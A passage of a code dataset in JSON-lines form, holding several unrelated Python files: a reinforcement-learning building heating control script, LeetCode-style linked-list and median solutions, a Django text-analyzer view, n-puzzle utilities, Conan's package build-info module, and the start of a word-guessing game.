Memory\")\n print(len(Agent_1.memory))\n counter= counter + 1\n\n abs_time = i * step\n minutes = ((abs_time) % 3600) / 60\n days = math.floor(abs_time / (3600 * 24))\n\n building_states = env.get_building_states() # returns a dictionary of all the current states of the building sensors\n hou_min = building_states['senHouDec_y']\n\n\n print('Days: {}, Hours: {} , Minutes: {}'.format(days,hou_min, minutes))\n raw_action_u1 = Agent_1.get_action(state)\n q_1 = Agent_1.target_predict_qvalue(state)\n\n # if hou_min <= 5.0:\n # raw_action_u1 = 0\n #\n # if hou_min > 22.1:\n # raw_action_u1 = 0\n\n print(\"Raw Action\")\n print(raw_action_u1)\n\n action_proc= [0,0.05,0.15,0.25,0.45]\n\n\n processed_act = [action_proc[raw_action_u1]]\n\n print()\n print(\"Heating Coil Action\")\n print(processed_act)\n\n print(\"Q-values_1\")\n print(q_1)\n\n next_state, reward, done, info = env.step(processed_act)\n score += reward\n\n next_state = np.reshape(next_state, [1, state_size])\n building_states = env.get_building_states()\n\n if counter % (12) == 0:\n Agent_1.train_model()\n\n if counter % (12 * 4) == 0:\n Agent_1.update_target_model()\n\n weather_states = env.get_weather_forecast()\n\n print (\"Dry bulb temp: {}\".format(weather_states['TDryBul'][0]))\n\n # Get Power\n print(\"Total Power; Zone 0:{}, Zone 1:{}, Zone 2: {}, Zone 3: {}, Zone 4; {}\".format(\n round(building_states['senPowCor_y'], 2),\n round(building_states['senPowPer1_y'], 2),\n round(building_states['senPowPer2_y'], 2),\n round(building_states['senPowPer3_y'], 2),\n round(building_states['senPowPer4_y'], 2)))\n\n \n print()\n\n # Append samples\n Agent_1.append_sample(state, raw_action_u1, reward, next_state, done)\n\n if last_ep == 0:\n mem_list_1.append((state, raw_action_u1, reward, next_state, done)) # 1st episode\n else:\n mem_list_1 = mem_list_1.append(\n {'States': state, 'Action': raw_action_u1, 'Reward': reward, 'Next_State': next_state, 'Done': done},\n ignore_index=True)\n\n state = next_state\n\n print('Days: {}, Hours: {} , Minutes: {}'.format(days, hou_min, minutes))\n print(next_state, reward, done, info)\n\n print(\"Room Temperature; Zone 0: {}, Zone 1: {}, Zone 2: {}, Zone 3: {}, Zone 4: {}, OA Temp: {}\".format(\n building_states['senTemRoom_y'],\n building_states['senTemRoom1_y'],\n building_states['senTemRoom2_y'],\n building_states['senTemRoom3_y'],\n building_states['senTemRoom4_y'],\n building_states['senTemOA_y']))\n\n\n print(\"Exploration\")\n print (Agent_1.exploration_value())\n\n u=env.get_input_hist()\n\n print(\"Score\")\n print(score)\n\n print(\"\\n\")\n\n # Store Data\n Historian[\"time\"].append(i * step)\n Historian[\"states\"].append(state[0])\n Historian[\"episodes\"].append(e)\n Historian[\"rewards\"].append(reward)\n Historian[\"action_1\"].append(processed_act[0])\n Historian['senTemOA_y'].append(building_states['senTemOA_y'])\n Historian['day_no'].append(day_no)\n\n Historian[\"senTRoom_y\"].append(building_states['senTemRoom_y'])\n Historian[\"senTRoom1_y\"].append(building_states['senTemRoom1_y'])\n Historian['senTRoom2_y'].append(building_states['senTemRoom2_y'])\n Historian['senTRoom3_y'].append(building_states['senTemRoom3_y'])\n Historian['senTRoom4_y'].append(building_states['senTemRoom4_y'])\n\n Historian[\"Total_Pow_Dem_0\"].append(building_states['senPowCor_y'])\n Historian[\"Total_Pow_Dem_1\"].append(building_states['senPowPer1_y'])\n Historian[\"Total_Pow_Dem_2\"].append(building_states['senPowPer2_y'])\n Historian[\"Total_Pow_Dem_3\"].append(building_states['senPowPer3_y'])\n Historian[\"Total_Pow_Dem_4\"].append(building_states['senPowPer4_y'])\n\n Historian[\"Heating_Pow_Dem_0\"].append(building_states['senHeaPow_y'])\n Historian[\"Heating_Pow_Dem_1\"].append(building_states['senHeaPow1_y'])\n Historian[\"Heating_Pow_Dem_2\"].append(building_states['senHeaPow2_y'])\n Historian[\"Heating_Pow_Dem_3\"].append(building_states['senHeaPow3_y'])\n Historian[\"Heating_Pow_Dem_4\"].append(building_states['senHeaPow4_y'])\n\n Historian[\"Cooling_Pow_Dem_0\"].append(building_states['senCCPow_y'])\n Historian[\"Cooling_Pow_Dem_1\"].append(building_states['senCCPow1_y'])\n Historian[\"Cooling_Pow_Dem_2\"].append(building_states['senCCPow2_y'])\n Historian[\"Cooling_Pow_Dem_3\"].append(building_states['senCCPow3_y'])\n Historian[\"Cooling_Pow_Dem_4\"].append(building_states['senCCPow4_y'])\n\n Historian[\"Zone_1_HC_Action\"].append(u['PSZACcontroller_oveHeaPer1_u'])\n\n # Historian['Damper_0'].append(u['PSZACcontroller_oveDamCor_u'])\n # Historian['Damper_1'].append(u['PSZACcontroller_oveDamP1_u'])\n # Historian['Damper_2'].append(u['PSZACcontroller_oveDamP2_u'])\n # Historian['Damper_3'].append(u['PSZACcontroller_oveDamP3_u'])\n # Historian['Damper_4'].append(u['PSZACcontroller_oveDamP4_u'])\n zonetemp.extend([building_states['senTemRoom1_y'] - 273.15])\n heatingcoil.extend([building_states['senPowPer1_y']])\n plot(zonetemp, heatingcoil, Historian, axes, plotutils)\n\n\n # Print KPIs\n kpi = (env.get_KPIs())\n\n for kpi_name in kpi_list:\n KPI_hist[kpi_name].append(kpi[kpi_name])\n KPI_hist['episodes'].append(e)\n KPI_hist['scores'].append(score)\n KPI_hist['day_no'].append(day_no)\n print(\"Agent Memory : {}\".format(len(Agent_1.memory)))\n\n KPI_df = pd.DataFrame.from_dict(KPI_hist)\n KPI_df.to_csv(\"RL_Data_test/01_KPI/dr_KPI_v2_\" + str(e) + \".csv\")\n\n df_m_1 = pd.DataFrame(mem_list_1, columns=['States', 'Action', 'Reward', 'Next_State', 'Done'])\n df_m_1.to_csv(\"RL_Data_test/04_Mem/mem_data_\" + str(e) + \".csv\")\n\n Historian_df = pd.DataFrame.from_dict(Historian)\n Historian_df.to_csv(\"RL_Data_test/dr_data_test_v2_\" + str(e) + \".csv\")\n Agent_1.model_save_weights(\"RL_Data_test/02_NN/DQN_\" + str(e) + \".h5\")\n\n env.print_KPIs()\n\n\n\n\n\n\nprint('\\nTest case complete.')\n# --------------------\n# Get result data\n\n\n\n\n\n","repo_name":"henze-research-group/MODRLC","sub_path":"examples/python/RLC-spawnrefsmalloffice/DQN_Test_run.py","file_name":"DQN_Test_run.py","file_ext":"py","file_size_in_byte":15067,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"29502967086","text":"# Reorder LinkedLists in Python\n# Author: Pavan kumar Paluri\n# LeetCode-Medium \n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reorderList(self, head: ListNode) -> None:\n \"\"\"\n Do not return anything, modify head in-place instead.\n \"\"\"\n # 3 stage algorithm:\n # stage -1 : Find the mid-point in the linkedlist\n # Stage-2: Reverse the second half of the linkedlist\n # Stage-3: Merge the first half and the reversed second half such that the odd elements are occupied by the first half and even elements are occupied by the second half\n \n # base condition:\n if head is None:\n return \n # Stage-1:\n fast, slow = head, head\n while fast.next is not None:\n fast = fast.next \n if fast.next is not None:\n slow = slow.next\n fast = fast.next\n # If here: slow exactly at mid-pt and fast is at end of list\n # Stage-2:\n current = slow.next \n prev = None \n slow.next = None\n while current is not None:\n tmp = current.next\n current.next = prev\n prev = current \n current = tmp\n # Stage-3:\n head1, head2 = head, prev\n while head2 is not None:\n tmpp = head1.next\n head1.next = head2\n head1 = head2\n head2 = tmpp \n \n","repo_name":"pvpk1994/Leetcode_Medium","sub_path":"Python/LinkedLists/Reordering.py","file_name":"Reordering.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39241512151","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef index(request):\n return render(request,'index.html')\n\ndef analyze(request):\n djtxt = request.POST.get('text', 'default')\n removepunc = request.POST.get('removepunc', 'off')\n fullcaps = request.POST.get('fullcaps', 'off')\n newlineremover = request.POST.get('linerem', 'off')\n charCounter = request.POST.get('count', 'off')\n params = {}\n\n if djtxt is None :\n return HttpResponse('Please enter some text.')\n\n else :\n if removepunc == \"on\" :\n punc = '''!@#$%^&*()_+-=[]\\;',./{}|:\"<>?'''\n analyzed = \"\"\n removed_Punctuations = \"\"\n for char in djtxt:\n if char not in punc:\n analyzed = analyzed + char\n else:\n removed_Punctuations = removed_Punctuations + char \n \n params = {'purpose': removed_Punctuations, 'analyzed_text': analyzed}\n djtxt = analyzed\n \n if fullcaps==\"on\":\n analyzed = \"\"\n for char in djtxt:\n analyzed = analyzed + char.upper()\n params = {'purpose': 'Changes to uppercase', 'analyzed_text': analyzed}\n djtxt = analyzed\n \n if newlineremover==\"on\":\n analyzed = \"\"\n for char in djtxt:\n if char !=\"\\n\" and char!=\"\\r\" :\n analyzed = analyzed + char\n params = {'purpose': 'Removed New Lines', 'analyzed_text': analyzed}\n djtxt = analyzed\n \n if charCounter==\"on\":\n analyzed = len(djtxt)\n params = {'purpose': 'Counting total characters...', 'analyzed_text': analyzed}\n djtxt = analyzed\n \n\n return render(request, 'analyze.html', params) \n\n if (removepunc!=\"on\" and fullcaps!=\"on\" and newlineremover!=\"on\" and charCounter!=\"on\") :\n return HttpResponse('Please select any operations.')","repo_name":"Arnab-png/Django","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16113680389","text":"import numpy\nimport re\n\n\ndef basic_check(npuzzle, size):\n if npuzzle.shape != (size, size):\n raise Exception('Not valid npuzzle, map error')\n\n unique_elements = set()\n\n for el in npuzzle:\n unique_elements = unique_elements.union(set(el))\n\n if len(unique_elements) != size * size:\n raise Exception('Not valid npuzzle, map error, dublicate elements')\n\n final_set = {elem for elem in range(size * size)}\n\n if final_set.intersection(unique_elements) != final_set:\n raise Exception('Not valid npuzzle, map error')\n\n\ndef make_arguments(parser):\n parser.add_argument('-H', '--heuristics', choices=['M', 'DH', 'H', 'E', 'D', 'A'], default='M',\n dest='heuristics',\n help='''Select heuristics to solve.\n M - for Manhattan distance.\n DH - for Diagonal distance + Hemming distance.\n E - for Euclidean distance.\n D - for Diagonal distance.\n A - for all above.\n Default value is M''')\n parser.add_argument(\"-s\", \"--solvable\", action=\"store_true\", default=False,\n help=\"Generates solvable puzzle. Not to use with -u.\")\n parser.add_argument(\"-u\", \"--unsolvable\", action=\"store_true\", default=False,\n help=\"Generates unsolvable\")\n parser.add_argument(\"-i\", \"--iterations\", type=int, default=10000, help=\"Passes number\")\n\n parser.add_argument('-f', '--file', default='', type=str, help='filepath to puzzle textfile')\n\n parser.add_argument('-g', '--greedy', action='store_true', help='''Greedy one. Not to use\n with -uc''', dest='greedy')\n\n parser.add_argument('-uc', '--uniformcost', action='store_true', help='''Uniform-cost search\n ''', dest='uniformcost')\n parser.add_argument(\"-size\", type=int, help=\"Map size, >= 3\", default=3, dest='size')\n\n parser.add_argument('-q', '--queuesize', type=int, default=100, help='''Set size''', dest='queue_size')\n args = parser.parse_args()\n\n return args\n\n\ndef list_to_string(list_map, size):\n space = len(str(size * size))\n str_map = ''\n for coord_y in range(size):\n for coord_x in range(size):\n str_map += str(list_map[coord_y * size + coord_x]).rjust(space) + ' '\n str_map += '\\n'\n return str_map\n\n\ndef str_to_numpy_array(string_map, size):\n start_map = list()\n lines = string_map.strip().split('\\n')\n\n for line in lines:\n row = re.findall(r'\\d+', line)\n row = [int(digit) for digit in row]\n start_map.append(row)\n\n npuzzle = numpy.array(start_map)\n\n if npuzzle.shape != (size, size):\n raise Exception('Not valid npuzzle, map error')\n\n return npuzzle\n\n\ndef str_from_file_to_numpy_array(args):\n start_map = list()\n size = args.size\n filename = args.file\n\n try:\n with open(filename, 'r') as lines:\n for line in lines:\n row = re.findall(r'\\d+', line)\n row = [int(digit) for digit in row]\n start_map.append(row)\n npuzzle = numpy.array(start_map)\n\n except Exception:\n raise Exception('Not valid path to file')\n\n basic_check(npuzzle, size)\n\n return npuzzle\n\n\ndef is_solvable(npuzzle_map_numpy, size):\n inv = 0\n size_not_even = size % 2 != 0\n # Make an array from map\n array_map = npuzzle_map_numpy.flatten()\n\n for i, puzzle in enumerate(array_map):\n for elem in array_map[:i]:\n if not puzzle:\n break\n if elem > puzzle:\n inv += 1\n\n is_inv_even = inv % 2 == 0\n\n if size_not_even:\n return not is_inv_even\n if 0 in npuzzle_map_numpy[::-2]:\n return is_inv_even\n elif 0 in npuzzle_map_numpy[::2]:\n return not is_inv_even\n return False\n\n","repo_name":"opogiba/npuzzle","sub_path":"uttils.py","file_name":"uttils.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31841814535","text":"import copy\nimport json\nimport os\nfrom collections import OrderedDict, defaultdict\n\nfrom conan.api.output import ConanOutput\nfrom conans.errors import ConanException\nfrom conans.util.files import load, save\n\n_DIRS_VAR_NAMES = [\"_includedirs\", \"_srcdirs\", \"_libdirs\", \"_resdirs\", \"_bindirs\", \"_builddirs\",\n \"_frameworkdirs\", \"_objects\"]\n_FIELD_VAR_NAMES = [\"_system_libs\", \"_frameworks\", \"_libs\", \"_defines\", \"_cflags\", \"_cxxflags\",\n \"_sharedlinkflags\", \"_exelinkflags\"]\n_ALL_NAMES = _DIRS_VAR_NAMES + _FIELD_VAR_NAMES\n\n\nclass MockInfoProperty:\n \"\"\"\n # TODO: Remove in 2.X\n to mock user_info and env_info\n \"\"\"\n counter = {}\n package = None\n\n def __init__(self, name):\n self._name = name\n\n @staticmethod\n def message():\n if not MockInfoProperty.counter:\n return\n ConanOutput().warning(\"Usage of deprecated Conan 1.X features that will be removed in \"\n \"Conan 2.X:\", warn_tag=\"deprecated\")\n for k, v in MockInfoProperty.counter.items():\n ConanOutput().warning(f\" '{k}' used in: {', '.join(v)}\", warn_tag=\"deprecated\")\n MockInfoProperty.counter = {}\n\n def __getitem__(self, key):\n MockInfoProperty.counter.setdefault(self._name, set()).add(self.package)\n return []\n\n def __setitem__(self, key, value):\n MockInfoProperty.counter.setdefault(self._name, set()).add(self.package)\n\n def __getattr__(self, attr):\n MockInfoProperty.counter.setdefault(self._name, set()).add(self.package)\n return []\n\n def __setattr__(self, attr, value):\n if attr != \"_name\":\n MockInfoProperty.counter.setdefault(self._name, set()).add(self.package)\n return super(MockInfoProperty, self).__setattr__(attr, value)\n\n\nclass _Component:\n\n def __init__(self, set_defaults=False):\n # ###### PROPERTIES\n self._properties = None\n\n # ###### DIRECTORIES\n self._includedirs = None # Ordered list of include paths\n self._srcdirs = None # Ordered list of source paths\n self._libdirs = None # Directories to find libraries\n self._resdirs = None # Directories to find resources, data, etc\n self._bindirs = None # Directories to find executables and shared libs\n self._builddirs = None\n self._frameworkdirs = None\n\n # ##### FIELDS\n self._system_libs = None # Ordered list of system libraries\n self._frameworks = None # Macos .framework\n self._libs = None # The libs to link against\n self._defines = None # preprocessor definitions\n self._cflags = None # pure C flags\n self._cxxflags = None # C++ compilation flags\n self._sharedlinkflags = None # linker flags\n self._exelinkflags = None # linker flags\n self._objects = None # linker flags\n\n self._sysroot = None\n self._requires = None\n\n # LEGACY 1.X fields, can be removed in 2.X\n self.names = MockInfoProperty(\"cpp_info.names\")\n self.filenames = MockInfoProperty(\"cpp_info.filenames\")\n self.build_modules = MockInfoProperty(\"cpp_info.build_modules\")\n\n if set_defaults:\n self.includedirs = [\"include\"]\n self.libdirs = [\"lib\"]\n self.bindirs = [\"bin\"]\n\n def serialize(self):\n return {\n \"includedirs\": self._includedirs,\n \"srcdirs\": self._srcdirs,\n \"libdirs\": self._libdirs,\n \"resdirs\": self._resdirs,\n \"bindirs\": self._bindirs,\n \"builddirs\": self._builddirs,\n \"frameworkdirs\": self._frameworkdirs,\n \"system_libs\": self._system_libs,\n \"frameworks\": self._frameworks,\n \"libs\": self._libs,\n \"defines\": self._defines,\n \"cflags\": self._cflags,\n \"cxxflags\": self._cxxflags,\n \"sharedlinkflags\": self._sharedlinkflags,\n \"exelinkflags\": self._exelinkflags,\n \"objects\": self._objects,\n \"sysroot\": self._sysroot,\n \"requires\": self._requires,\n \"properties\": self._properties\n }\n\n @staticmethod\n def deserialize(contents):\n result = _Component()\n for field, value in contents.items():\n setattr(result, f\"_{field}\", value)\n return result\n\n @property\n def includedirs(self):\n if self._includedirs is None:\n self._includedirs = []\n return self._includedirs\n\n @includedirs.setter\n def includedirs(self, value):\n self._includedirs = value\n\n @property\n def srcdirs(self):\n if self._srcdirs is None:\n self._srcdirs = []\n return self._srcdirs\n\n @srcdirs.setter\n def srcdirs(self, value):\n self._srcdirs = value\n\n @property\n def libdirs(self):\n if self._libdirs is None:\n self._libdirs = []\n return self._libdirs\n\n @libdirs.setter\n def libdirs(self, value):\n self._libdirs = value\n\n @property\n def resdirs(self):\n if self._resdirs is None:\n self._resdirs = []\n return self._resdirs\n\n @resdirs.setter\n def resdirs(self, value):\n self._resdirs = value\n\n @property\n def bindirs(self):\n if self._bindirs is None:\n self._bindirs = []\n return self._bindirs\n\n @bindirs.setter\n def bindirs(self, value):\n self._bindirs = value\n\n @property\n def builddirs(self):\n if self._builddirs is None:\n self._builddirs = []\n return self._builddirs\n\n @builddirs.setter\n def builddirs(self, value):\n self._builddirs = value\n\n @property\n def frameworkdirs(self):\n if self._frameworkdirs is None:\n self._frameworkdirs = []\n return self._frameworkdirs\n\n @frameworkdirs.setter\n def frameworkdirs(self, value):\n self._frameworkdirs = value\n\n @property\n def bindir(self):\n bindirs = self.bindirs\n assert bindirs\n assert len(bindirs) == 1\n return bindirs[0]\n\n @property\n def libdir(self):\n libdirs = self.libdirs\n assert libdirs\n assert len(libdirs) == 1\n return libdirs[0]\n\n @property\n def includedir(self):\n includedirs = self.includedirs\n assert includedirs\n assert len(includedirs) == 1\n return includedirs[0]\n\n @property\n def system_libs(self):\n if self._system_libs is None:\n self._system_libs = []\n return self._system_libs\n\n @system_libs.setter\n def system_libs(self, value):\n self._system_libs = value\n\n @property\n def frameworks(self):\n if self._frameworks is None:\n self._frameworks = []\n return self._frameworks\n\n @frameworks.setter\n def frameworks(self, value):\n self._frameworks = value\n\n @property\n def libs(self):\n if self._libs is None:\n self._libs = []\n return self._libs\n\n @libs.setter\n def libs(self, value):\n self._libs = value\n\n @property\n def defines(self):\n if self._defines is None:\n self._defines = []\n return self._defines\n\n @defines.setter\n def defines(self, value):\n self._defines = value\n\n @property\n def cflags(self):\n if self._cflags is None:\n self._cflags = []\n return self._cflags\n\n @cflags.setter\n def cflags(self, value):\n self._cflags = value\n\n @property\n def cxxflags(self):\n if self._cxxflags is None:\n self._cxxflags = []\n return self._cxxflags\n\n @cxxflags.setter\n def cxxflags(self, value):\n self._cxxflags = value\n\n @property\n def sharedlinkflags(self):\n if self._sharedlinkflags is None:\n self._sharedlinkflags = []\n return self._sharedlinkflags\n\n @sharedlinkflags.setter\n def sharedlinkflags(self, value):\n self._sharedlinkflags = value\n\n @property\n def exelinkflags(self):\n if self._exelinkflags is None:\n self._exelinkflags = []\n return self._exelinkflags\n\n @exelinkflags.setter\n def exelinkflags(self, value):\n self._exelinkflags = value\n\n @property\n def objects(self):\n if self._objects is None:\n self._objects = []\n return self._objects\n\n @objects.setter\n def objects(self, value):\n self._objects = value\n\n @property\n def sysroot(self):\n if self._sysroot is None:\n self._sysroot = \"\"\n return self._sysroot\n\n @sysroot.setter\n def sysroot(self, value):\n self._sysroot = value\n\n @property\n def requires(self):\n if self._requires is None:\n self._requires = []\n return self._requires\n\n @requires.setter\n def requires(self, value):\n self._requires = value\n\n @property\n def required_component_names(self):\n \"\"\" Names of the required components of the same package (not scoped with ::)\"\"\"\n if self.requires is None:\n return []\n return [r for r in self.requires if \"::\" not in r]\n\n def set_property(self, property_name, value):\n if self._properties is None:\n self._properties = {}\n self._properties[property_name] = value\n\n def get_property(self, property_name):\n if self._properties is None:\n return None\n try:\n return self._properties[property_name]\n except KeyError:\n pass\n\n def get_init(self, attribute, default):\n # Similar to dict.setdefault\n item = getattr(self, attribute)\n if item is not None:\n return item\n setattr(self, attribute, default)\n return default\n\n def merge(self, other, overwrite=False):\n \"\"\"\n @param overwrite:\n @type other: _Component\n \"\"\"\n def merge_list(o, d):\n d.extend(e for e in o if e not in d)\n\n for varname in _ALL_NAMES:\n other_values = getattr(other, varname)\n if other_values is not None:\n if not overwrite:\n current_values = self.get_init(varname, [])\n merge_list(other_values, current_values)\n else:\n setattr(self, varname, other_values)\n\n if other.requires:\n current_values = self.get_init(\"requires\", [])\n merge_list(other.requires, current_values)\n\n if other._properties:\n current_values = self.get_init(\"_properties\", {})\n current_values.update(other._properties)\n\n def set_relative_base_folder(self, folder):\n for varname in _DIRS_VAR_NAMES:\n origin = getattr(self, varname)\n if origin is not None:\n origin[:] = [os.path.join(folder, el) for el in origin]\n properties = self._properties\n if properties is not None:\n modules = properties.get(\"cmake_build_modules\") # Only this prop at this moment\n if modules is not None:\n assert isinstance(modules, list), \"cmake_build_modules must be a list\"\n properties[\"cmake_build_modules\"] = [os.path.join(folder, v) for v in modules]\n\n def deploy_base_folder(self, package_folder, deploy_folder):\n def relocate(el):\n rel_path = os.path.relpath(el, package_folder)\n return os.path.join(deploy_folder, rel_path)\n\n for varname in _DIRS_VAR_NAMES:\n origin = getattr(self, varname)\n if origin is not None:\n origin[:] = [relocate(f) for f in origin]\n properties = self._properties\n if properties is not None:\n modules = properties.get(\"cmake_build_modules\") # Only this prop at this moment\n if modules is not None:\n assert isinstance(modules, list), \"cmake_build_modules must be a list\"\n properties[\"cmake_build_modules\"] = [relocate(f) for f in modules]\n\n def parsed_requires(self):\n return [r.split(\"::\", 1) if \"::\" in r else (None, r) for r in self.requires]\n\n\nclass CppInfo:\n\n def __init__(self, set_defaults=False):\n self.components = defaultdict(lambda: _Component(set_defaults))\n self._package = _Component(set_defaults)\n\n def __getattr__(self, attr):\n # all cpp_info.xxx of not defined things will go to the global package\n return getattr(self._package, attr)\n\n def __setattr__(self, attr, value):\n if attr in (\"components\", \"_package\", \"_aggregated\"):\n super(CppInfo, self).__setattr__(attr, value)\n else:\n setattr(self._package, attr, value)\n\n def serialize(self):\n ret = {\"root\": self._package.serialize()}\n for component_name, info in self.components.items():\n ret[component_name] = info.serialize()\n return ret\n\n def deserialize(self, content):\n self._package = _Component.deserialize(content.pop(\"root\"))\n for component_name, info in content.items():\n self.components[component_name] = _Component.deserialize(info)\n return self\n\n def save(self, path):\n save(path, json.dumps(self.serialize()))\n\n def load(self, path):\n content = json.loads(load(path))\n return self.deserialize(content)\n\n @property\n def has_components(self):\n return len(self.components) > 0\n\n def merge(self, other, overwrite=False):\n \"\"\"Merge 'other' into self. 'other' can be an old cpp_info object\n Used to merge Layout source + build cpp objects info (editables)\n @type other: CppInfo\n @param other: The other CppInfo to merge\n @param overwrite: New values from other overwrite the existing ones\n \"\"\"\n # Global merge\n self._package.merge(other._package, overwrite)\n # sysroot only of package, not components, first defined wins\n self._package.sysroot = self._package.sysroot or other._package.sysroot\n # COMPONENTS\n for cname, c in other.components.items():\n # Make sure each component created on the fly does not bring new defaults\n self.components.setdefault(cname, _Component(set_defaults=False)).merge(c, overwrite)\n\n def set_relative_base_folder(self, folder):\n \"\"\"Prepend the folder to all the directories definitions, that are relative\"\"\"\n self._package.set_relative_base_folder(folder)\n for component in self.components.values():\n component.set_relative_base_folder(folder)\n\n def deploy_base_folder(self, package_folder, deploy_folder):\n \"\"\"Prepend the folder to all the directories\"\"\"\n self._package.deploy_base_folder(package_folder, deploy_folder)\n for component in self.components.values():\n component.deploy_base_folder(package_folder, deploy_folder)\n\n def _raise_circle_components_requires_error(self):\n \"\"\"\n Raise an exception because of a requirements loop detection in components.\n The exception message gives some information about the involved components.\n \"\"\"\n deps_set = set()\n for comp_name, comp in self.components.items():\n for dep_name, dep in self.components.items():\n for require in dep.required_component_names:\n if require == comp_name:\n deps_set.add(\" {} requires {}\".format(dep_name, comp_name))\n dep_mesg = \"\\n\".join(deps_set)\n raise ConanException(f\"There is a dependency loop in \"\n f\"'self.cpp_info.components' requires:\\n{dep_mesg}\")\n\n def get_sorted_components(self):\n \"\"\"\n Order the components taking into account if they depend on another component in the\n same package (not scoped with ::). First less dependant.\n\n :return: ``OrderedDict`` {component_name: component}\n \"\"\"\n processed = [] # Names of the components ordered\n # TODO: Cache the sort\n while len(self.components) > len(processed):\n cached_processed = processed[:]\n for name, c in self.components.items():\n req_processed = [n for n in c.required_component_names if n not in processed]\n if not req_processed and name not in processed:\n processed.append(name)\n # If cached_processed did not change then detected cycle components requirements!\n if cached_processed == processed:\n self._raise_circle_components_requires_error()\n\n return OrderedDict([(cname, self.components[cname]) for cname in processed])\n\n def aggregated_components(self):\n \"\"\"Aggregates all the components as global values, returning a new CppInfo\"\"\"\n # This method had caching before, but after a ``--deployer``, the package changes\n # location, and this caching was invalid, still pointing to the Conan cache instead of\n # the deployed\n if self.has_components:\n result = _Component()\n # Reversed to make more dependant first\n for component in reversed(self.get_sorted_components().values()):\n result.merge(component)\n # NOTE: The properties are not aggregated because they might refer only to the\n # component like \"cmake_target_name\" describing the target name FOR THE component\n # not the namespace.\n # FIXME: What to do about sysroot?\n result._properties = copy.copy(self._package._properties)\n else:\n result = copy.copy(self._package)\n aggregated = CppInfo()\n aggregated._package = result\n return aggregated\n\n def check_component_requires(self, conanfile):\n \"\"\" quality check for component requires:\n - Check that all recipe ``requires`` are used if consumer recipe explicit opt-in to use\n component requires\n - Check that component external dep::comp dependency \"dep\" is a recipe \"requires\"\n - Check that every internal component require actually exist\n It doesn't check that external components do exist\n \"\"\"\n if not self.has_components and not self._package.requires:\n return\n # Accumulate all external requires\n external = set(r.split(\"::\")[0] for r in self._package.requires if \"::\" in r)\n internal = set(r for r in self._package.requires if \"::\" not in r)\n # TODO: Cache this, this is computed in different places\n for key, comp in self.components.items():\n external.update(r.split(\"::\")[0] for r in comp.requires if \"::\" in r)\n internal.update(r for r in comp.requires if \"::\" not in r)\n\n missing_internal = list(internal.difference(self.components))\n if missing_internal:\n raise ConanException(f\"{conanfile}: Internal components not found: {missing_internal}\")\n if not external:\n return\n # Only direct host (not test) dependencies can define required components\n direct_dependencies = [d.ref.name for d in conanfile.requires.values()\n if not d.build and not d.is_test and d.visible and not d.override]\n\n for e in external:\n if e not in direct_dependencies:\n raise ConanException(\n f\"{conanfile}: required component package '{e}::' not in dependencies\")\n # TODO: discuss if there are cases that something is required but not transitive\n for e in direct_dependencies:\n if e not in external:\n raise ConanException(\n f\"{conanfile}: Required package '{e}' not in component 'requires'\")\n\n @property\n def required_components(self):\n \"\"\"Returns a list of tuples with (require, component_name) required by the package\n If the require is internal (to another component), the require will be None\"\"\"\n # FIXME: Cache the value\n # First aggregate without repetition, respecting the order\n ret = [r for r in self._package.requires]\n for comp in self.components.values():\n for r in comp.requires:\n if r not in ret:\n ret.append(r)\n # Then split the names\n ret = [r.split(\"::\") if \"::\" in r else (None, r) for r in ret]\n return ret\n","repo_name":"conan-io/conan","sub_path":"conans/model/build_info.py","file_name":"build_info.py","file_ext":"py","file_size_in_byte":20345,"program_lang":"python","lang":"en","doc_type":"code","stars":7343,"dataset":"github-code","pt":"77"} +{"seq_id":"39039555025","text":"import math\nclass Solution:\n def MedianOfArrays(self, array1, array2):\n # code here\n if len(array2) < len(array1):\n self.MedianOfArrays(array2, array1)\n low = 0\n high = len(array1)\n while low <= high:\n partitionx = (low + high) // 2\n partitiony = int((len(array1) + len(array2)) / 2 - partitionx)\n\n maxLeftx = -math.inf if partitionx == 0 else array1[partitionx - 1]\n minRightX = math.inf if partitionx == len(array1) else array1[partitionx]\n\n maxlefty = -math.inf if partitiony == 0 else array2[partitiony - 1]\n minRightY = +math.inf if partitiony == len(array2) else array2[partitiony]\n\n if maxLeftx <= minRightY and maxlefty <= minRightX:\n if (len(array1) + len(array2)) % 2 == 0:\n return (max(maxLeftx, maxlefty) + min(minRightX, minRightY)) / 2\n else:\n return max(maxLeftx, maxlefty)\n elif maxLeftx > minRightY:\n high = partitionx - 1\n else:\n low = partitionx + 1\nsol = Solution()\nprint(sol.MedianOfArrays([1,2,3,5],[4,6]))\n","repo_name":"spartan289/PycharmProjects","sub_path":"learn/media-of2sorted-array.py","file_name":"media-of2sorted-array.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29456096579","text":"import random\n\ndef escoger_palabra_secreta():\n palabras = [\"python\", \"programacion\", \"computadora\", \"desarrollo\", \"algoritmo\"]\n palabra_secreta = random.choice(palabras)\n return palabra_secreta\n\ndef ocultar_letras(palabra, cantidad):\n letras_ocultas = random.sample(range(len(palabra)), cantidad)\n palabra_oculta = list(palabra)\n for indice in letras_ocultas:\n palabra_oculta[indice] = \"_\"\n return \"\".join(palabra_oculta)\n\ndef revisar_letra(palabra_secreta, palabra_oculta, letra):\n nueva_palabra_oculta = list(palabra_oculta)\n for indice, caracter in enumerate(palabra_secreta):\n if caracter == letra:\n nueva_palabra_oculta[indice] = letra\n return \"\".join(nueva_palabra_oculta)\n\nif __name__ == \"__main__\":\n palabra_secreta = escoger_palabra_secreta()\n letras_ocultas = random.randint(1, len(palabra_secreta))\n palabra_oculta = ocultar_letras(palabra_secreta, letras_ocultas)\n intentos = 7\n\n print(\"Bienvenido al juego de adivinar la palabra secreta.\")\n print(\"La palabra tiene\", len(palabra_secreta), \"letras.\")\n print(\"Tienes\", intentos, \"intentos para adivinar la palabra.\")\n\n while intentos > 0:\n print(\"\\nPalabra:\", palabra_oculta)\n letra 